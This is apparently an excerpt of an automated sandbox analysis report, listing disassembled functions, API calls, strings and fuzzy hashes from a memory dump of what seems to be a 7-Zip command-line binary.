                                • free.MSVCRT ref: 00467D5A
                                • free.MSVCRT ref: 00467D62
                                • free.MSVCRT ref: 00467D6A
                                • free.MSVCRT ref: 00467D77
                                • free.MSVCRT ref: 00467D80
                                  • Part of subcall function 00441784: free.MSVCRT ref: 004417B7
                                  • Part of subcall function 00441784: free.MSVCRT ref: 004417BF
                                  • Part of subcall function 00441784: free.MSVCRT ref: 004417CC
                                  • Part of subcall function 00441784: free.MSVCRT ref: 004417F8
                                  • Part of subcall function 00441784: free.MSVCRT ref: 00441801
                                  • Part of subcall function 00441784: free.MSVCRT ref: 00441809
                                  • Part of subcall function 00441784: free.MSVCRT ref: 00441816
                                Strings
                                Memory Dump Source
                                • Source File: 00000005.00000002.1874078280.0000000000411000.00000020.00000001.01000000.00000008.sdmp, Offset: 00410000, based on PE: true
                                • Associated: 00000005.00000002.1874055934.0000000000410000.00000002.00000001.01000000.00000008.sdmpDownload File
                                • Associated: 00000005.00000002.1874123006.0000000000470000.00000002.00000001.01000000.00000008.sdmpDownload File
                                • Associated: 00000005.00000002.1874156294.0000000000491000.00000004.00000001.01000000.00000008.sdmpDownload File
                                • Associated: 00000005.00000002.1874177917.0000000000494000.00000002.00000001.01000000.00000008.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_5_2_410000_7z.jbxd
                                Similarity
                                • API ID: free
                                • String ID: $|F
                                • API String ID: 1294909896-3694191985
                                • Opcode ID: a2d9f6ed36859aef40b0543bcc9ffb590241e82db697b8cfc55c95f9d211cc78
                                • Instruction ID: bb7aa02378a273fc65e0630a3d9172c6d6c88182e3016dc353753ff525c7fea3
                                • Opcode Fuzzy Hash: a2d9f6ed36859aef40b0543bcc9ffb590241e82db697b8cfc55c95f9d211cc78
                                • Instruction Fuzzy Hash: FB119333745A4886DB11FF36E9512AD6321EB80F9CB58062B9E2D5B355EF6CCC938348
                                Function 0046B774 Relevance: 14.2, APIs: 6, Strings: 2, Instructions: 204stringCOMMON
                                Download Yara Rule
                                APIs
                                • strcmp.MSVCRT ref: 0046B9EA
                                • fputs.MSVCRT ref: 0046BA0B
                                • GetTickCount.KERNEL32 ref: 0046B794
                                  • Part of subcall function 00413798: free.MSVCRT ref: 004137C4
                                  • Part of subcall function 00413798: memmove.MSVCRT ref: 004137DF
                                  • Part of subcall function 00413C68: memmove.MSVCRT(0041B159), ref: 00413CA7
                                  • Part of subcall function 00413EC0: memmove.MSVCRT ref: 00413F06
                                • strcmp.MSVCRT ref: 0046B7DA
                                • wcscmp.MSVCRT ref: 0046B7FA
                                • strcmp.MSVCRT ref: 0046B862
                                Strings
                                Memory Dump Source
                                • Source File: 00000005.00000002.1874078280.0000000000411000.00000020.00000001.01000000.00000008.sdmp, Offset: 00410000, based on PE: true
                                • Associated: 00000005.00000002.1874055934.0000000000410000.00000002.00000001.01000000.00000008.sdmpDownload File
                                • Associated: 00000005.00000002.1874123006.0000000000470000.00000002.00000001.01000000.00000008.sdmpDownload File
                                • Associated: 00000005.00000002.1874156294.0000000000491000.00000004.00000001.01000000.00000008.sdmpDownload File
                                • Associated: 00000005.00000002.1874177917.0000000000494000.00000002.00000001.01000000.00000008.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_5_2_410000_7z.jbxd
                                Similarity
                                • API ID: memmovestrcmp$CountTickfputsfreewcscmp
                                • String ID: . $[Content]
                                • API String ID: 591578422-2304726976
                                • Opcode ID: 9094ce9056a28d657d41618d04ec6bfd7be09a4c8be3546634b690409dc7b727
                                • Instruction ID: b9e93193eb65d0c201aa753bb249c39f6188072250678c1399066b31000ebe39
                                • Opcode Fuzzy Hash: 9094ce9056a28d657d41618d04ec6bfd7be09a4c8be3546634b690409dc7b727
                                • Instruction Fuzzy Hash: 06811673700A45A7CA18EB2AC68029D7365F744788F405117DB5987B20EF78E9FAC789
                                Function 00462B78 Relevance: 10.6, APIs: 5, Strings: 1, Instructions: 77COMMON
                                Download Yara Rule
                                APIs
                                • fputs.MSVCRT ref: 00462C2D
                                • fputs.MSVCRT ref: 00462C4C
                                • free.MSVCRT ref: 00462C65
                                • free.MSVCRT ref: 00462C70
                                  • Part of subcall function 00412E68: free.MSVCRT ref: 00412EA0
                                  • Part of subcall function 00412790: fputs.MSVCRT ref: 004127D9
                                  • Part of subcall function 00412790: free.MSVCRT ref: 004127E5
                                  • Part of subcall function 00412790: free.MSVCRT ref: 004127F0
                                • free.MSVCRT ref: 00462C7B
                                Strings
                                Memory Dump Source
                                • Source File: 00000005.00000002.1874078280.0000000000411000.00000020.00000001.01000000.00000008.sdmp, Offset: 00410000, based on PE: true
                                • Associated: 00000005.00000002.1874055934.0000000000410000.00000002.00000001.01000000.00000008.sdmpDownload File
                                • Associated: 00000005.00000002.1874123006.0000000000470000.00000002.00000001.01000000.00000008.sdmpDownload File
                                • Associated: 00000005.00000002.1874156294.0000000000491000.00000004.00000001.01000000.00000008.sdmpDownload File
                                • Associated: 00000005.00000002.1874177917.0000000000494000.00000002.00000001.01000000.00000008.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_5_2_410000_7z.jbxd
                                Similarity
                                • API ID: free$fputs
                                • String ID: =
                                • API String ID: 2444650769-2525689732
                                • Opcode ID: 6af2d0b8ce2b096ca53b8f6896709cd8d10ae8ae6da6be3d4fe635be2d879f48
                                • Instruction ID: 2b92f72226b81ada54ea39543fcd85646610be761c119152ae975c92eb2b093d
                                • Opcode Fuzzy Hash: 6af2d0b8ce2b096ca53b8f6896709cd8d10ae8ae6da6be3d4fe635be2d879f48
                                • Instruction Fuzzy Hash: 4321E673208A4095CE20EF26E5812AE6720F7D5BE8F445227FF5E43668DF6CC985C709
                                Function 0046E24E Relevance: 9.1, APIs: 6, Instructions: 65COMMON
                                Download Yara Rule
                                APIs
                                Memory Dump Source
                                • Source File: 00000005.00000002.1874078280.0000000000411000.00000020.00000001.01000000.00000008.sdmp, Offset: 00410000, based on PE: true
                                • Associated: 00000005.00000002.1874055934.0000000000410000.00000002.00000001.01000000.00000008.sdmpDownload File
                                • Associated: 00000005.00000002.1874123006.0000000000470000.00000002.00000001.01000000.00000008.sdmpDownload File
                                • Associated: 00000005.00000002.1874156294.0000000000491000.00000004.00000001.01000000.00000008.sdmpDownload File
                                • Associated: 00000005.00000002.1874177917.0000000000494000.00000002.00000001.01000000.00000008.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_5_2_410000_7z.jbxd
                                Similarity
                                • API ID: _initterm$__getmainargs__set_app_type__setusermatherr_cexit
                                • String ID:
                                • API String ID: 352749199-0
                                • Opcode ID: 3bc03dd1b1b73e9071d32506f7fc1c6f2074b6c84ad5a41d6ab94059779c88a3
                                • Instruction ID: 65512ceac6bd0eec237ffd30477fbbe717dde31d12a44fb6741015695a9334df
                                • Opcode Fuzzy Hash: 3bc03dd1b1b73e9071d32506f7fc1c6f2074b6c84ad5a41d6ab94059779c88a3
                                • Instruction Fuzzy Hash: 35317EB5619B42CADB40DF16E8A435A77A1F780B68F50022AEB6D437B4DF3CD845CB09
                                Function 0046E219 Relevance: 9.1, APIs: 6, Instructions: 53COMMON
                                Download Yara Rule
                                APIs
                                Memory Dump Source
                                • Source File: 00000005.00000002.1874078280.0000000000411000.00000020.00000001.01000000.00000008.sdmp, Offset: 00410000, based on PE: true
                                • Associated: 00000005.00000002.1874055934.0000000000410000.00000002.00000001.01000000.00000008.sdmpDownload File
                                • Associated: 00000005.00000002.1874123006.0000000000470000.00000002.00000001.01000000.00000008.sdmpDownload File
                                • Associated: 00000005.00000002.1874156294.0000000000491000.00000004.00000001.01000000.00000008.sdmpDownload File
                                • Associated: 00000005.00000002.1874177917.0000000000494000.00000002.00000001.01000000.00000008.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_5_2_410000_7z.jbxd
                                Similarity
                                • API ID: _initterm$__getmainargs__set_app_type__setusermatherr_cexit
                                • String ID:
                                • API String ID: 352749199-0
                                • Opcode ID: 4afe18664bfbb2c87daaaa07b71c9015096e4dbab92b590f771811bd17689861
                                • Instruction ID: 1b708162cb0ae972eed9e0b58b790790c1ea066c2fecfcb872aff0aa4402009e
                                • Opcode Fuzzy Hash: 4afe18664bfbb2c87daaaa07b71c9015096e4dbab92b590f771811bd17689861
                                • Instruction Fuzzy Hash: 64212BB5619B42C6EB40DF1AE85434A7361F784BA8F400226EB6D837B4DF3CD846CB09
                                Function 0046E23A Relevance: 9.1, APIs: 6, Instructions: 53COMMON
                                Download Yara Rule
                                APIs
                                Memory Dump Source
                                • Source File: 00000005.00000002.1874078280.0000000000411000.00000020.00000001.01000000.00000008.sdmp, Offset: 00410000, based on PE: true
                                • Associated: 00000005.00000002.1874055934.0000000000410000.00000002.00000001.01000000.00000008.sdmpDownload File
                                • Associated: 00000005.00000002.1874123006.0000000000470000.00000002.00000001.01000000.00000008.sdmpDownload File
                                • Associated: 00000005.00000002.1874156294.0000000000491000.00000004.00000001.01000000.00000008.sdmpDownload File
                                • Associated: 00000005.00000002.1874177917.0000000000494000.00000002.00000001.01000000.00000008.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_5_2_410000_7z.jbxd
                                Similarity
                                • API ID: _initterm$__getmainargs__set_app_type__setusermatherr_cexit
                                • String ID:
                                • API String ID: 352749199-0
                                • Opcode ID: 4afe18664bfbb2c87daaaa07b71c9015096e4dbab92b590f771811bd17689861
                                • Instruction ID: 1b708162cb0ae972eed9e0b58b790790c1ea066c2fecfcb872aff0aa4402009e
                                • Opcode Fuzzy Hash: 4afe18664bfbb2c87daaaa07b71c9015096e4dbab92b590f771811bd17689861
                                • Instruction Fuzzy Hash: 64212BB5619B42C6EB40DF1AE85434A7361F784BA8F400226EB6D837B4DF3CD846CB09
                                Function 0046E286 Relevance: 9.1, APIs: 6, Instructions: 53COMMON
                                Download Yara Rule
                                APIs
                                Memory Dump Source
                                • Source File: 00000005.00000002.1874078280.0000000000411000.00000020.00000001.01000000.00000008.sdmp, Offset: 00410000, based on PE: true
                                • Associated: 00000005.00000002.1874055934.0000000000410000.00000002.00000001.01000000.00000008.sdmpDownload File
                                • Associated: 00000005.00000002.1874123006.0000000000470000.00000002.00000001.01000000.00000008.sdmpDownload File
                                • Associated: 00000005.00000002.1874156294.0000000000491000.00000004.00000001.01000000.00000008.sdmpDownload File
                                • Associated: 00000005.00000002.1874177917.0000000000494000.00000002.00000001.01000000.00000008.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_5_2_410000_7z.jbxd
                                Similarity
                                • API ID: _initterm$__getmainargs__set_app_type__setusermatherr_cexit
                                • String ID:
                                • API String ID: 352749199-0
                                • Opcode ID: 4afe18664bfbb2c87daaaa07b71c9015096e4dbab92b590f771811bd17689861
                                • Instruction ID: 1b708162cb0ae972eed9e0b58b790790c1ea066c2fecfcb872aff0aa4402009e
                                • Opcode Fuzzy Hash: 4afe18664bfbb2c87daaaa07b71c9015096e4dbab92b590f771811bd17689861
                                • Instruction Fuzzy Hash: 64212BB5619B42C6EB40DF1AE85434A7361F784BA8F400226EB6D837B4DF3CD846CB09
                                Function 00453D32 Relevance: 8.9, APIs: 7, Instructions: 120COMMON
                                Download Yara Rule
                                APIs
                                Memory Dump Source
                                • Source File: 00000005.00000002.1874078280.0000000000411000.00000020.00000001.01000000.00000008.sdmp, Offset: 00410000, based on PE: true
                                • Associated: 00000005.00000002.1874055934.0000000000410000.00000002.00000001.01000000.00000008.sdmpDownload File
                                • Associated: 00000005.00000002.1874123006.0000000000470000.00000002.00000001.01000000.00000008.sdmpDownload File
                                • Associated: 00000005.00000002.1874156294.0000000000491000.00000004.00000001.01000000.00000008.sdmpDownload File
                                • Associated: 00000005.00000002.1874177917.0000000000494000.00000002.00000001.01000000.00000008.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_5_2_410000_7z.jbxd
                                Similarity
                                • API ID: free
                                • String ID:
                                • API String ID: 1294909896-0
                                • Opcode ID: 20e1ef8bc94a73f9caac168113105966d4da2292baba33d8fa9636bfa917258b
                                • Instruction ID: 25b8bcb6b865e551b718598e37cd67ff230c2f9df7f840f5ca5d80353b0c170a
                                • Opcode Fuzzy Hash: 20e1ef8bc94a73f9caac168113105966d4da2292baba33d8fa9636bfa917258b
                                • Instruction Fuzzy Hash: FA417233205B4992CB10DF26E45129E67A0F789BCAF441127EE4E47729DF3CC9AAC748
                                Function 004496F8 Relevance: 8.9, APIs: 7, Instructions: 107COMMON
                                Download Yara Rule
                                APIs
                                Memory Dump Source
                                • Source File: 00000005.00000002.1874078280.0000000000411000.00000020.00000001.01000000.00000008.sdmp, Offset: 00410000, based on PE: true
                                • Associated: 00000005.00000002.1874055934.0000000000410000.00000002.00000001.01000000.00000008.sdmpDownload File
                                • Associated: 00000005.00000002.1874123006.0000000000470000.00000002.00000001.01000000.00000008.sdmpDownload File
                                • Associated: 00000005.00000002.1874156294.0000000000491000.00000004.00000001.01000000.00000008.sdmpDownload File
                                • Associated: 00000005.00000002.1874177917.0000000000494000.00000002.00000001.01000000.00000008.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_5_2_410000_7z.jbxd
                                Similarity
                                • API ID: free
                                • String ID:
                                • API String ID: 1294909896-0
                                • Opcode ID: 34494f8055e4ac842c8fee3ddeb30b0204388ad4d84a894665da7a39221f3768
                                • Instruction ID: 7df004652cb8e3a8b2ce75317819038597651c343bacc0f020ea02c9aa8fde0a
                                • Opcode Fuzzy Hash: 34494f8055e4ac842c8fee3ddeb30b0204388ad4d84a894665da7a39221f3768
                                • Instruction Fuzzy Hash: 2041CB3222498592DB20EB25E4507DFA360FBD5798F405217FADD876A9DF3CC946CB08
                                Function 0043CF10 Relevance: 8.8, APIs: 7, Instructions: 62COMMON
                                Download Yara Rule
                                APIs
                                Memory Dump Source
                                • Source File: 00000005.00000002.1874078280.0000000000411000.00000020.00000001.01000000.00000008.sdmp, Offset: 00410000, based on PE: true
                                • Associated: 00000005.00000002.1874055934.0000000000410000.00000002.00000001.01000000.00000008.sdmpDownload File
                                • Associated: 00000005.00000002.1874123006.0000000000470000.00000002.00000001.01000000.00000008.sdmpDownload File
                                • Associated: 00000005.00000002.1874156294.0000000000491000.00000004.00000001.01000000.00000008.sdmpDownload File
                                • Associated: 00000005.00000002.1874177917.0000000000494000.00000002.00000001.01000000.00000008.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_5_2_410000_7z.jbxd
                                Similarity
                                • API ID: free
                                • String ID:
                                • API String ID: 1294909896-0
                                • Opcode ID: 6090aba66b1dc48e1abda49c94261c98d8ff034174972193e8d4cf115a61bc83
                                • Instruction ID: 1038fa98e4fddc4add0a77470ee4e877183083e57aadaa882ceeb0702fcc14bc
                                • Opcode Fuzzy Hash: 6090aba66b1dc48e1abda49c94261c98d8ff034174972193e8d4cf115a61bc83
                                • Instruction Fuzzy Hash: 6B116622740B4D878A10BE33E69106D2310EB56BE4B484727DF396B7D0DF5CC9728308
                                Function 00441784 Relevance: 8.8, APIs: 7, Instructions: 53COMMON
                                Download Yara Rule
                                APIs
                                Memory Dump Source
                                • Source File: 00000005.00000002.1874078280.0000000000411000.00000020.00000001.01000000.00000008.sdmp, Offset: 00410000, based on PE: true
                                • Associated: 00000005.00000002.1874055934.0000000000410000.00000002.00000001.01000000.00000008.sdmpDownload File
                                • Associated: 00000005.00000002.1874123006.0000000000470000.00000002.00000001.01000000.00000008.sdmpDownload File
                                • Associated: 00000005.00000002.1874156294.0000000000491000.00000004.00000001.01000000.00000008.sdmpDownload File
                                • Associated: 00000005.00000002.1874177917.0000000000494000.00000002.00000001.01000000.00000008.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_5_2_410000_7z.jbxd
                                Similarity
                                • API ID: free
                                • String ID:
                                • API String ID: 1294909896-0
                                • Opcode ID: caaeff056fdabb2c2e7321f671ea6a354ebf0e5937cb7c37bed008342a00664b
                                • Instruction ID: 2696b1c14b145ded5d2475bc81561eb5a9f350ea3ab8fe081447d99b5ac98a9e
                                • Opcode Fuzzy Hash: caaeff056fdabb2c2e7321f671ea6a354ebf0e5937cb7c37bed008342a00664b
                                • Instruction Fuzzy Hash: 9501C637741A884A9B21EE37D9500AD53219B81FE8729022BDE2D5F354DF6CCC928344
                                Function 0043CA94 Relevance: 8.8, APIs: 7, Instructions: 45COMMON
                                Download Yara Rule
                                APIs
                                Memory Dump Source
                                • Source File: 00000005.00000002.1874078280.0000000000411000.00000020.00000001.01000000.00000008.sdmp, Offset: 00410000, based on PE: true
                                • Associated: 00000005.00000002.1874055934.0000000000410000.00000002.00000001.01000000.00000008.sdmpDownload File
                                • Associated: 00000005.00000002.1874123006.0000000000470000.00000002.00000001.01000000.00000008.sdmpDownload File
                                • Associated: 00000005.00000002.1874156294.0000000000491000.00000004.00000001.01000000.00000008.sdmpDownload File
                                • Associated: 00000005.00000002.1874177917.0000000000494000.00000002.00000001.01000000.00000008.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_5_2_410000_7z.jbxd
                                Similarity
                                • API ID: free
                                • String ID:
                                • API String ID: 1294909896-0
                                • Opcode ID: 7fbbcc2e99cb0114e1a3119e233bbbd991d18d9e1ce76fad5144490d7254e9df
                                • Instruction ID: 584152c3a50f3eaf3b317fa76e7d2d44bf1552ed47e0a7ee40553bb2774b6370
                                • Opcode Fuzzy Hash: 7fbbcc2e99cb0114e1a3119e233bbbd991d18d9e1ce76fad5144490d7254e9df
                                • Instruction Fuzzy Hash: F511C032301B4986CF14EF36D4A126D6320FBC5F98B5457269E2E9B765CF6CC896C344
                                Function 00452732 Relevance: 7.6, APIs: 6, Instructions: 150COMMON
                                Download Yara Rule
                                APIs
                                Memory Dump Source
                                • Source File: 00000005.00000002.1874078280.0000000000411000.00000020.00000001.01000000.00000008.sdmp, Offset: 00410000, based on PE: true
                                • Associated: 00000005.00000002.1874055934.0000000000410000.00000002.00000001.01000000.00000008.sdmpDownload File
                                • Associated: 00000005.00000002.1874123006.0000000000470000.00000002.00000001.01000000.00000008.sdmpDownload File
                                • Associated: 00000005.00000002.1874156294.0000000000491000.00000004.00000001.01000000.00000008.sdmpDownload File
                                • Associated: 00000005.00000002.1874177917.0000000000494000.00000002.00000001.01000000.00000008.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_5_2_410000_7z.jbxd
                                Similarity
                                • API ID: free
                                • String ID:
                                • API String ID: 1294909896-0
                                • Opcode ID: b0bcdb6301756ffe1143f522789456b6d5b0ee7ea4f7ff0088f80b14dc7d2b30
                                • Instruction ID: 7388837f453f32baa635505ec72d6c99ba25a4de66d6cab3e7878ab410a31ce7
                                • Opcode Fuzzy Hash: b0bcdb6301756ffe1143f522789456b6d5b0ee7ea4f7ff0088f80b14dc7d2b30
                                • Instruction Fuzzy Hash: 35513A72301A0591CB10EF26D19129E2761F789F89F905117EE0E83729CF7CCA9AC749
                                Function 0046738C Relevance: 7.6, APIs: 6, Instructions: 77COMMON
                                Download Yara Rule
                                APIs
                                Memory Dump Source
                                • Source File: 00000005.00000002.1874078280.0000000000411000.00000020.00000001.01000000.00000008.sdmp, Offset: 00410000, based on PE: true
                                • Associated: 00000005.00000002.1874055934.0000000000410000.00000002.00000001.01000000.00000008.sdmpDownload File
                                • Associated: 00000005.00000002.1874123006.0000000000470000.00000002.00000001.01000000.00000008.sdmpDownload File
                                • Associated: 00000005.00000002.1874156294.0000000000491000.00000004.00000001.01000000.00000008.sdmpDownload File
                                • Associated: 00000005.00000002.1874177917.0000000000494000.00000002.00000001.01000000.00000008.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_5_2_410000_7z.jbxd
                                Similarity
                                • API ID: free
                                • String ID:
                                • API String ID: 1294909896-0
                                • Opcode ID: 757d814618d8855f7859b7308ee0aa145b0e50a47704a47a6e8009e6b379919c
                                • Instruction ID: ec72633ea369e6f8c55e2a2868b738f61410aceb218002e701158ebc88de3c82
                                • Opcode Fuzzy Hash: 757d814618d8855f7859b7308ee0aa145b0e50a47704a47a6e8009e6b379919c
                                • Instruction Fuzzy Hash: 6C213767602B4886CB259F36D45436E6720EB85FA8B294326DE2D1B798DF38C851C315
                                Function 00460CDC Relevance: 7.1, APIs: 1, Strings: 3, Instructions: 53COMMON
                                Download Yara Rule
                                APIs
                                • fputs.MSVCRT ref: 00460D6D
                                  • Part of subcall function 0046B4D0: memset.MSVCRT ref: 0046B515
                                  • Part of subcall function 0046B4D0: fputs.MSVCRT ref: 0046B53A
                                Strings
                                Memory Dump Source
                                • Source File: 00000005.00000002.1874078280.0000000000411000.00000020.00000001.01000000.00000008.sdmp, Offset: 00410000, based on PE: true
                                • Associated: 00000005.00000002.1874055934.0000000000410000.00000002.00000001.01000000.00000008.sdmpDownload File
                                • Associated: 00000005.00000002.1874123006.0000000000470000.00000002.00000001.01000000.00000008.sdmpDownload File
                                • Associated: 00000005.00000002.1874156294.0000000000491000.00000004.00000001.01000000.00000008.sdmpDownload File
                                • Associated: 00000005.00000002.1874177917.0000000000494000.00000002.00000001.01000000.00000008.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_5_2_410000_7z.jbxd
                                Similarity
                                • API ID: fputs$memset
                                • String ID: Extracting archive: $Open$Testing archive:
                                • API String ID: 3543874852-295398807
                                • Opcode ID: b1178c46515e896b0f6170faf34d6861dc22f827c5187f6a6673a0046fddd555
                                • Instruction ID: 64dd7237b60fbf985e2ae9fd55a1adcd003e9249ed168fbcd5275cb3c910951c
                                • Opcode Fuzzy Hash: b1178c46515e896b0f6170faf34d6861dc22f827c5187f6a6673a0046fddd555
                                • Instruction Fuzzy Hash: A711BF62302A8684DB54DB2AC9847EA2361E755F8CF1881368E0D8B355EF3984DAC318
                                Function 00462AD0 Relevance: 7.0, APIs: 3, Strings: 1, Instructions: 42COMMON
                                Download Yara Rule
                                APIs
                                • fputs.MSVCRT ref: 00462AF3
                                • fputs.MSVCRT ref: 00462B03
                                • free.MSVCRT ref: 00462B50
                                  • Part of subcall function 004629A8: fputs.MSVCRT ref: 004629ED
                                  • Part of subcall function 004629A8: fputs.MSVCRT ref: 00462A7B
                                  • Part of subcall function 004629A8: free.MSVCRT ref: 00462AAB
                                Strings
                                Memory Dump Source
                                • Source File: 00000005.00000002.1874078280.0000000000411000.00000020.00000001.01000000.00000008.sdmp, Offset: 00410000, based on PE: true
                                • Associated: 00000005.00000002.1874055934.0000000000410000.00000002.00000001.01000000.00000008.sdmpDownload File
                                • Associated: 00000005.00000002.1874123006.0000000000470000.00000002.00000001.01000000.00000008.sdmpDownload File
                                • Associated: 00000005.00000002.1874156294.0000000000491000.00000004.00000001.01000000.00000008.sdmpDownload File
                                • Associated: 00000005.00000002.1874177917.0000000000494000.00000002.00000001.01000000.00000008.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_5_2_410000_7z.jbxd
                                Similarity
                                • API ID: fputs$free
                                • String ID: =
                                • API String ID: 3873070119-2525689732
                                • Opcode ID: cfb2291ab21511647248a8338fcf3dc506ebee51bdc10893b2169669ca87b7a6
                                • Instruction ID: b23f75be175d53e0639deddf9f1232207adf810be708cb0a9872e59793ad2ea9
                                • Opcode Fuzzy Hash: cfb2291ab21511647248a8338fcf3dc506ebee51bdc10893b2169669ca87b7a6
                                • Instruction Fuzzy Hash: 75F0DBA2304A0091DE10EF27EB5037A13129BC5FF8F045316AD6D47BD8DF6CC9968709
                                Function 00428830 Relevance: 6.1, APIs: 1, Strings: 3, Instructions: 119COMMON
                                Download Yara Rule
                                APIs
                                • free.MSVCRT ref: 004289D7
                                  • Part of subcall function 004264E8: free.MSVCRT ref: 004265C5
                                  • Part of subcall function 00426E88: GetLastError.KERNEL32 ref: 00426EA3
                                  • Part of subcall function 00426E88: free.MSVCRT ref: 00426EF4
                                  • Part of subcall function 00426E88: free.MSVCRT ref: 00426F2D
                                Strings
                                Memory Dump Source
                                • Source File: 00000005.00000002.1874078280.0000000000411000.00000020.00000001.01000000.00000008.sdmp, Offset: 00410000, based on PE: true
                                • Associated: 00000005.00000002.1874055934.0000000000410000.00000002.00000001.01000000.00000008.sdmpDownload File
                                • Associated: 00000005.00000002.1874123006.0000000000470000.00000002.00000001.01000000.00000008.sdmpDownload File
                                • Associated: 00000005.00000002.1874156294.0000000000491000.00000004.00000001.01000000.00000008.sdmpDownload File
                                • Associated: 00000005.00000002.1874177917.0000000000494000.00000002.00000001.01000000.00000008.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_5_2_410000_7z.jbxd
                                Similarity
                                • API ID: free$ErrorLast
                                • String ID: Incorrect reparse stream$Unknown reparse stream$can't delete file
                                • API String ID: 408039514-394804653
                                • Opcode ID: 88ec8297f9e23e0ec126f7f7c0500b9844928d1bdfebefa7bf21fb12f3e5a416
                                • Instruction ID: 5b5a5abf0c0d5d31422e18b9949190ea69874a5cd610885c5bdc5a2744dff2a8
                                • Opcode Fuzzy Hash: 88ec8297f9e23e0ec126f7f7c0500b9844928d1bdfebefa7bf21fb12f3e5a416
                                • Instruction Fuzzy Hash: 4441CCA730669594DB219E3AA4103EF2B20A785BD8F8C012BCF894B355DF78C589C369
                                Function 00427924 Relevance: 6.1, APIs: 1, Strings: 3, Instructions: 108COMMON
                                Download Yara Rule
                                APIs
                                Strings
                                • :Zone.Identifier, xrefs: 004279DD
                                • doc dot wbk docx docm dotx dotm docb wll wwl xls xlt xlm xlsx xlsm xltx xltm xlsb xla xlam ppt pot pps ppa ppam pptx pptm potx potm ppam ppsx ppsm sldx sldm , xrefs: 004279C6
                                • Cannot set length for output file, xrefs: 0042797F
                                Memory Dump Source
                                • Source File: 00000005.00000002.1874078280.0000000000411000.00000020.00000001.01000000.00000008.sdmp, Offset: 00410000, based on PE: true
                                • Associated: 00000005.00000002.1874055934.0000000000410000.00000002.00000001.01000000.00000008.sdmpDownload File
                                • Associated: 00000005.00000002.1874123006.0000000000470000.00000002.00000001.01000000.00000008.sdmpDownload File
                                • Associated: 00000005.00000002.1874156294.0000000000491000.00000004.00000001.01000000.00000008.sdmpDownload File
                                • Associated: 00000005.00000002.1874177917.0000000000494000.00000002.00000001.01000000.00000008.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_5_2_410000_7z.jbxd
                                Similarity
                                • API ID: free
                                • String ID: doc dot wbk docx docm dotx dotm docb wll wwl xls xlt xlm xlsx xlsm xltx xltm xlsb xla xlam ppt pot pps ppa ppam pptx pptm potx potm ppam ppsx ppsm sldx sldm $:Zone.Identifier$Cannot set length for output file
                                • API String ID: 1294909896-1552544479
                                • Opcode ID: 95d128e0864b841a27fa4d131d8ed5442c0accbf7f060dd31cc92dc6e18bbb30
                                • Instruction ID: 5445082a84e5f2bd13a729a3b8e94bd3abc5b0877aa6ffa834ecafd7badc94cd
                                • Opcode Fuzzy Hash: 95d128e0864b841a27fa4d131d8ed5442c0accbf7f060dd31cc92dc6e18bbb30
                                • Instruction Fuzzy Hash: D94193722087D190DF11DF36E4503DE6720E741BA8F885237EA9D4B6AADF2CC98AC714
                                Function 0046E200 Relevance: 6.1, APIs: 4, Instructions: 54COMMON
                                Download Yara Rule
                                Memory Dump Source
                                • Source File: 00000005.00000002.1874078280.0000000000411000.00000020.00000001.01000000.00000008.sdmp, Offset: 00410000, based on PE: true
                                • Associated: 00000005.00000002.1874055934.0000000000410000.00000002.00000001.01000000.00000008.sdmpDownload File
                                • Associated: 00000005.00000002.1874123006.0000000000470000.00000002.00000001.01000000.00000008.sdmpDownload File
                                • Associated: 00000005.00000002.1874156294.0000000000491000.00000004.00000001.01000000.00000008.sdmpDownload File
                                • Associated: 00000005.00000002.1874177917.0000000000494000.00000002.00000001.01000000.00000008.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_5_2_410000_7z.jbxd
                                Similarity
                                • API ID:
                                • String ID:
                                • API String ID:
                                • Opcode ID: 70d3439854e7706087ba43be2736c122568b0a749180fca4c848fbc153217cb3
                                • Instruction ID: 2e3ae3fbaeda8ca9cc138c5849829edb8d5ccd9c85fd584ed2b694b8325358c2
                                • Opcode Fuzzy Hash: 70d3439854e7706087ba43be2736c122568b0a749180fca4c848fbc153217cb3
                                • Instruction Fuzzy Hash: DE314AB5215B41C6EB40CF15E89035A77A0F784BA4F40422AEB6D437B4DB3CD885CB08
                                Function 00416FCC Relevance: 6.0, APIs: 4, Instructions: 47COMMON
                                Download Yara Rule
                                APIs
                                Memory Dump Source
                                • Source File: 00000005.00000002.1874078280.0000000000411000.00000020.00000001.01000000.00000008.sdmp, Offset: 00410000, based on PE: true
                                • Associated: 00000005.00000002.1874055934.0000000000410000.00000002.00000001.01000000.00000008.sdmpDownload File
                                • Associated: 00000005.00000002.1874123006.0000000000470000.00000002.00000001.01000000.00000008.sdmpDownload File
                                • Associated: 00000005.00000002.1874156294.0000000000491000.00000004.00000001.01000000.00000008.sdmpDownload File
                                • Associated: 00000005.00000002.1874177917.0000000000494000.00000002.00000001.01000000.00000008.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_5_2_410000_7z.jbxd
                                Similarity
                                • API ID: AttributesFilefree
                                • String ID:
                                • API String ID: 1936811914-0
                                • Opcode ID: 2438c4d46c2d3bedd8f8d32da497e8a1ec4bb712b86c7c0aadf2914d42ad0083
                                • Instruction ID: 68b849b28104d8e52a2ef9644f653fde0740514207287d4290b874fa3157b54c
